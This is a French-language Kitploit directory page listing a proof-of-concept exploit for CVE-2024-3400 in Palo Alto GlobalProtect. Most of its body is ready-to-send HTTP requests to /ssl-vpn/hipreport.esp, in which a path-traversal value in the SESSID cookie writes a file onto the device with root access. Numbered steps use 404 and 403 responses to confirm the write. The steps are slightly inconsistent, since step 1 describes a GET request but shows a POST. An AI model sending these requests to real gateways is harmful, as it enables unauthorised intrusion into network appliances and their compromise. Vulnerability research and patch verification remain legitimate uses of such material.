Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-3400-Palo-Alto-OS-Command-Injection — Preuve de concept d'exploit pour CVE-2024-3400, une vulnérabilité d'injection de commandes dans Palo Alto GlobalProtect, démontrant le téléchargement et la vérification de fichiers via des requêtes HTTP spécialement conçues. | Kitploit
Outils/GitHubGitHub/0xr2r/cve-2024-3400-palo-alto-os-command-injection
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHub0xr2r/cve-2024-3400-palo-alto-os-command-injection

CVE-2024-3400-Palo-Alto-OS-Command-Injection

Preuve de concept d'exploit pour CVE-2024-3400, une vulnérabilité d'injection de commandes dans Palo Alto GlobalProtect, démontrant le téléchargement et la vérification de fichiers via des requêtes HTTP spécialement conçues.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
62il y a 2 ansPas encore vérifié

#Étapes :


#1. Vérifiez si le fichier (0xr2r.txt) est présent sur l'appareil en exécutant la requête GET ci-dessous ou nous pouvons vérifier de la même manière en ouvrant

https://domain.com/global-protect/portal/images/0xr2r.txt URL dans le navigateur Si vous obtenez une réponse 404, cela signifie que le fichier n'est pas présent.


root@kitploit:~


POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

#2. Maintenant, placez le fichier (0xr2r.txt) sur l'appareil en exécutant la requête POST ci-dessous. Cela créera le fichier sur l'appareil sous le chemin donné avec un accès root.


root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r


#3. Maintenant, si vous essayez à nouveau d'accéder au fichier, vous devriez recevoir une réponse 403 au lieu de 404. Cela prouve que le fichier (0xr2r.txt) est présent sur l'appareil avec un accès root.


root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r
Télécharger l’outil